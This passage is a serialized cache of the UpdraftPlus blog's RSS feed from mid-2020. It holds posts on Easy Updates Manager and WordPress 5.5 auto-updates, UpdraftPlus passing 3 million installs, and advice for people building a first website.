Manager\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:6:\"update\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:13:\"WordPress 5.5\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://updraftplus.com/?p=639067\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:745:\"<p>Easy Updates Manager has long been the leader in WordPress update management. We&#8217;ve watched Easy Updates Manager go from a humble 10,000 installs to its current 300,000 install count. With WordPress 5.5, auto-updates have landed in WordPress Core. This is &#8230; <a href=\"https://updraftplus.com/easy-updates-manager-and-wordpress-5-5/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/easy-updates-manager-and-wordpress-5-5/\">Easy Updates Manager and WordPress 5.5</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Joe Miles\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:4159:\"<p><span style=\"font-weight: 400;\">Easy Updates Manager has long been the leader in WordPress update management. We&#8217;ve watched Easy Updates Manager go from a humble 10,000 installs to its current 300,000 install count.</span></p>\n<p><span style=\"font-weight: 400;\">With WordPress 5.5, auto-updates have landed in WordPress Core. This is exciting.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2020/08/plugin-auto-updates-1.png\"><img class=\"alignnone wp-image-639073\" src=\"https://updraftplus.com/wp-content/uploads/2020/08/plugin-auto-updates-1.png\" alt=\"\" width=\"827\" height=\"595\" /></a></p>\n<p><span style=\"font-weight: 400;\">With this latest WordPress update, we had to make the tough decision whether to natively integrate with WordPress Core&#8217;s interpretation of automatic updates, in regards to plugins and themes. While the native core integration of auto-updates is well-thought and we foresee it becoming more powerful, EUM has taken the decision to continue to control updates through our unique and innovative interface.</span></p>\n<p><span style=\"font-weight: 400;\">One example is our plugins and themes screen. Users can still enable auto-updates through those screens and it integrates well with core emails and our log functionality. Additionally, you can also disable updates completely for certain assets.</span></p>\n<p><span style=\"font-weight: 400;\">EUM also integrates out-of-the-box with most third-party plugins and has worked with hosts throughout the years to make native automatic updates to plugins and themes a possibility, even on managed hosts.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2020/08/image-4-1.png\"><img class=\"alignnone wp-image-639074\" src=\"https://updraftplus.com/wp-content/uploads/2020/08/image-4-1.png\" alt=\"\" width=\"688\" height=\"239\" /></a></p>\n<p><span style=\"font-weight: 400;\">When a user couples automatic updates with backups that most managed hosts handle natively, or our own UpdraftPlus backup solution, users are covered even if the worst should happen.</span></p>\n<p><span style=\"font-weight: 400;\">With EUM Free, we have identified that most users simply want auto-updates to be enabled holistically throughout WordPress. This includes plugin/theme updates, translation updates and WordPress Core updates (minor and major versions).</span></p>\n<p><span style=\"font-weight: 400;\">We foresee automatic updates, as they have landed in Core, to be a popular feature. We provide additional features with our Premium offering.</span></p>\n<p><span style=\"font-weight: 400;\">With EUM Premium, users are given more control over updates. Examples of our popular Premium features include:</span></p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Update scheduling &#8211; Control when updates are run to avoid excessive server load and downtime.</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Logs &#8211; Logs are a native feature, but premium allows you to integrate logs with third-party services such as Slack. The export log functionality also allows you to generate a report for clients.</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Email reports of pending updates &#8211; If for some reason an update isn&#8217;t available through auto-updates, we can send you a periodic report of updates that need action. This will also work if you have disabled an asset from updating.</span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">At Easy Updates Manager, we will strive to give users the features they need to have full control over their updates and will continue working with WordPress Core in regards to automatic updates. As Core updates mature, we will strive to integrate with native Core functionality when it makes sense.</span></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/easy-updates-manager-and-wordpress-5-5/\">Easy Updates Manager and WordPress 5.5</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://updraftplus.com/easy-updates-manager-and-wordpress-5-5/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"https://updraftplus.com/easy-updates-manager-and-wordpress-5-5/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:85:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n		\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:6:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"UpdraftPlus passes 3 million active installs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/Qb4w5kCZU10/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://updraftplus.com/updraftplus-passes-3-million-active-installs/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 12 Aug 2020 14:33:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:5:{i:0;a:5:{s:4:\"data\";s:18:\"UpdraftPlus growth\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:9:\"3 million\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:11:\"development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:6:\"growth\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:11:\"UpdraftPlus\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://updraftplus.com/?p=638131\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:748:\"<p>Thanks to your support, UpdraftPlus has just reached the amazing milestone of 3,000,000 active installs.  The UpdraftPlus office is in Wales, UK which has a population of 3 million &#8211; which means there’s a site actively using us for every &#8230; <a href=\"https://updraftplus.com/updraftplus-passes-3-million-active-installs/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/updraftplus-passes-3-million-active-installs/\">UpdraftPlus passes 3 million active installs</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Joe Miles\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2558:\"<p><span style=\"font-weight: 400;\">Thanks to your support, UpdraftPlus has just reached the amazing milestone of 3,000,000 active installs. </span></p>\n<p><span style=\"font-weight: 400;\">The UpdraftPlus office is in Wales, UK which has a population of 3 million &#8211; which means there’s a site actively using us for every person in this nation.</span></p>\n<p><span style=\"font-weight: 400;\">After hitting 2 million in December 2018, we’re humbled to reach this figure in an increasingly crowded and competitive marketplace. </span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2020/08/image-4.png\"><img class=\"alignnone size-full wp-image-638828\" src=\"https://updraftplus.com/wp-content/uploads/2020/08/image-4.png\" alt=\"\" width=\"570\" height=\"300\" srcset=\"https://updraftplus.com/wp-content/uploads/2020/08/image-4.png 570w, https://updraftplus.com/wp-content/uploads/2020/08/image-4-480x253.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 570px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">UpdraftPlus is now the 13th most popular plugin in the world.  E</span><span style=\"font-weight: 400;\">xcluding official WordPress.org and Automattic plugins (which are pre-installed or promoted heavily in the plugin installer interface), we&#8217;re 8th most popular.</span></p>\n<p><span style=\"font-weight: 400;\">We also remain the #1 backup plugin (All-in-One WP Migration, which includes a backup facility but markets itself essentially for migrations, is on 2 million, with Duplicator on 1 million) &#8211; the next biggest plugin that directly presents itself as a backup plugin is BackWPup on 600,000).</span></p>\n<p><span style=\"font-weight: 400;\">We’d like to thank the team here, who even during these difficult times, have all continued working to improve the plugin and provide support in order to give you the peace of mind they need by providing the highest quality possible backup experience</span></p>\n<p><span style=\"font-weight: 400;\">But we couldn’t carry out the developments and improvements that have made UpdraftPlus so popular without all of our loyal users. So thank you again, and here’s to the next million!</span></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/updraftplus-passes-3-million-active-installs/\">UpdraftPlus passes 3 million active installs</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"https://updraftplus.com/updraftplus-passes-3-million-active-installs/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://updraftplus.com/updraftplus-passes-3-million-active-installs/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:94:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:6:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"Where to find motivation and inspiration when building your first website\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/9-3pvoQHKXo/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"https://updraftplus.com/motivation-and-inspiration-ideas-when-building-your-first-website/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 31 Jul 2020 09:27:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:8:{i:0;a:5:{s:4:\"data\";s:20:\"Other WordPress news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:18:\"Training materials\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:6:\"course\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:13:\"first website\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:5:\"guide\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:5:\"ideas\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:6;a:5:{s:4:\"data\";s:13:\"inspirational\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:7;a:5:{s:4:\"data\";s:9:\"wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://updraftplus.com/?p=630657\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:813:\"<p>For most people, the internet is all about consumption. They go online to find entertainment, shop, learn and generally be distracted from all of the troubles and stress modern life is currently throwing at us. People are generally aware of &#8230; <a href=\"https://updraftplus.com/motivation-and-inspiration-ideas-when-building-your-first-website/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/motivation-and-inspiration-ideas-when-building-your-first-website/\">Where to find motivation and inspiration when building your first website</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Wayne Mullins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:8714:\"<p><span style=\"font-weight: 400;\">For most people, the internet is all about consumption. They go online to find entertainment, shop, learn and generally be distracted from all of the troubles and stress modern life is currently throwing at us. People are generally aware of the internet&#8217;s incredible potential for creative expression and professional development, but most people have never actually attempted to create their own websites.</span></p>\n<p><span style=\"font-weight: 400;\">When someone does resolve to take the first steps into the exciting and daunting world of building your first site, they have a remarkable journey ahead of them. Consult anyone with a history of web development (professional or amateur) and they’ll tell you that their first website project can be a transformative experience.</span></p>\n<p><span style=\"font-weight: 400;\">It’s isn’t an easy process though, particularly for those with minimal tech expertise, and not every attempt you make at building a website will work out. It can be easy for an aspiring web developer or entrepreneur to give up due to confusion about what to do technically, or even a lack of creative direction. After all, simple setup procedures and </span><a href=\"https://www.metaslider.com/should-you-use-a-free-wordpress-theme-for-your-website/\"><span style=\"font-weight: 400;\">free themes</span></a><span style=\"font-weight: 400;\"> can’t solve all design problems.</span></p>\n<p><span style=\"font-weight: 400;\">This blog is intended to help someone in such a position. If you know someone building their first site, or if you are working on building </span><i><span style=\"font-weight: 400;\">your </span></i><span style=\"font-weight: 400;\">first website, these inspirational ideas will hopefully help:</span></p>\n<h2><span style=\"font-weight: 400;\">Take a basic course</span></h2>\n<p><span style=\"font-weight: 400;\">While it is possible for someone with decent IT skills to cobble together a fairly decent website with no formal development tuition or training, it doesn’t mean it’s preferable. If you are trying to build a site but aren’t sure how to proceed, it is highly recommended that you think about taking a </span><a href=\"https://www.wpbeaverbuilder.com/wordpress-training-course/\"><span style=\"font-weight: 400;\">basic course</span></a><span style=\"font-weight: 400;\"> in website development. This can be a great way to pick up the fundamentals that can otherwise be missed so easily when you’re winging it.</span></p>\n<p><span style=\"font-weight: 400;\">When it comes to deciding which course you should take, it really depends on what you are willing to spend, how much you already know, what results you are trying to achieve and what type of website you are aiming to build. A simple blog website for example will require much less knowledge than a large online store with various payment, shipping, tax and language options. Udemy for example </span><a href=\"https://www.udemy.com/topic/wordpress/\"><span style=\"font-weight: 400;\">has various courses specifically for WordPress</span></a><span style=\"font-weight: 400;\">, many concentrating on different elements of the development process. Just one solid course can prove extremely useful. Remember to read user reviews before committing your time and money on a course though, as quality and results can vary.</span></p>\n<h2><span style=\"font-weight: 400;\">Research and read success stories</span></h2>\n<p><span style=\"font-weight: 400;\">A journey of a thousand miles starts with a single step: even though we all know this, it’s still tough for someone to take that step to place it into an appropriate context. If the process of developing your first website starts to drag, it is the easiest thing in the world to just give up on the idea, justifying this abandonment by assuming that it would never have amounted to anything anyway. As with all those well-meaning New Year’s resolutions that fall by the wayside after a month or two, the world is littered with partially designed and built websites that are ultimately forgotten because things got too difficult.</span></p>\n<p><span style=\"font-weight: 400;\">That’s where success stories become so meaningful. There are </span><a href=\"https://www.shopify.com/retail/5-successful-retail-businesses-that-started-off-as-side-hustles\"><span style=\"font-weight: 400;\">plenty of examples</span></a><span style=\"font-weight: 400;\"> out there of thriving businesses that started out slowly, without massive budgets or fanfare. Instead, many successful sites began as simple side hustles set up by aspiring entrepreneurs that eventually grew into highly successful and lucrative businesses. Their creators believed in themselves, worked hard on their websites and kept moving ahead until they achieved their goals. Knowing that success </span><i><span style=\"font-weight: 400;\">can </span></i><span style=\"font-weight: 400;\">be achieved is hugely important for getting through the tough early stages.</span></p>\n<h2><span style=\"font-weight: 400;\">Examine great sites</span></h2>\n<p><span style=\"font-weight: 400;\">When trying to build something great, it can be a massive challenge should you not be very experienced with the production process. It can even be tough to properly envisage exactly what you may be ultimately aiming for. What should the website ultimately look like? How should it work? What pages and categories should you have? In life, there can be a lot of value in having role models to emulate as it can provide inspiration and allow you to see how established and successful sites got where they are, giving you something to aim towards too.</span></p>\n<p><span style=\"font-weight: 400;\">Because of this, one of the best ways to get inspired when building your website is to closely examine the best and most successful websites out there that are similar to yours. Why do users like them so much? What lessons can you learn about how to build a great website? And most importantly, what can be done better?</span> <span style=\"font-weight: 400;\">This will allow you to return to your development project with a much clearer vision of where you would like to take your site.</span></p>\n<h2><span style=\"font-weight: 400;\">Join a community</span></h2>\n<p><span style=\"font-weight: 400;\">One of the best things about the online world has always been its ability to bring people from different backgrounds and lifestyles together. Whatever interest a given person is looking to pursue, they can be absolutely confident that there are relevant internet communities already in place, and that’s certainly the case for web development (and entrepreneurship in general).</span></p>\n<p><span style=\"font-weight: 400;\">Each content management system has numerous communities dedicated to it online, which are always a great place to start. Reddit is another great place for general advice: </span><a href=\"https://www.reddit.com/r/Entrepreneur/\"><span style=\"font-weight: 400;\">the r/Entrepreneur subreddit</span></a><span style=\"font-weight: 400;\"> has 650k members, which is a great place to ask broader business questions. There are also subs like </span><a href=\"https://www.reddit.com/r/webdev/\"><span style=\"font-weight: 400;\">r/webdev</span></a><span style=\"font-weight: 400;\"> (416k members) for more specific technical queries. There are also thousands of videos on YouTube that help show you how to develop and setup a WordPress site, taking you through all the steps needed to take your website plan from idea to reality. </span></p>\n<p><iframe title=\"How To Make a WordPress Website  - For Beginners\" width=\"1080\" height=\"608\" src=\"https://www.youtube.com/embed/8AZ8GqW5iak?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe></p>\n<p><span style=\"font-weight: 400;\">Inspiration can come in many forms and mean different things to different people, but at its core it’s about motivation: motivation to learn, to keep going, and to strive for greater achievement. While the ideas listed above are far from revolutionary, they are incredibly potent and just one of them can be enough to push a project through to fruition.</span></p>\n<p><a href=\"https://ecommerceplatforms.io\">Rodney Laws</a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/motivation-and-inspiration-ideas-when-building-your-first-website/\">Where to find motivation and inspiration when building your first website</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:95:\"https://updraftplus.com/motivation-and-inspiration-ideas-when-building-your-first-website/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"https://updraftplus.com/motivation-and-inspiration-ideas-when-building-your-first-website/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:82:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:6:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"5 effective on-site marketing tips for your WordPress site\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/Nf5VX_kCEcY/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"https://updraftplus.com/5-effective-on-site-marketing-tips-for-your-wordpress-site/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 17 Jul 2020 13:42:20 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:4:{i:0;a:5:{s:4:\"data\";s:20:\"Other WordPress news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:9:\"marketing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:4:\"tips\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:9:\"wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://updraftplus.com/?p=621029\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:803:\"<p>With 1.3 billion websites, WordPress is by far and away the top choice for website creation across the world. The platform&#8217;s popularity comes from allowing users to easily create personal sites, purchase domain names and customize the site with easy to &#8230; <a href=\"https://updraftplus.com/5-effective-on-site-marketing-tips-for-your-wordpress-site/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a 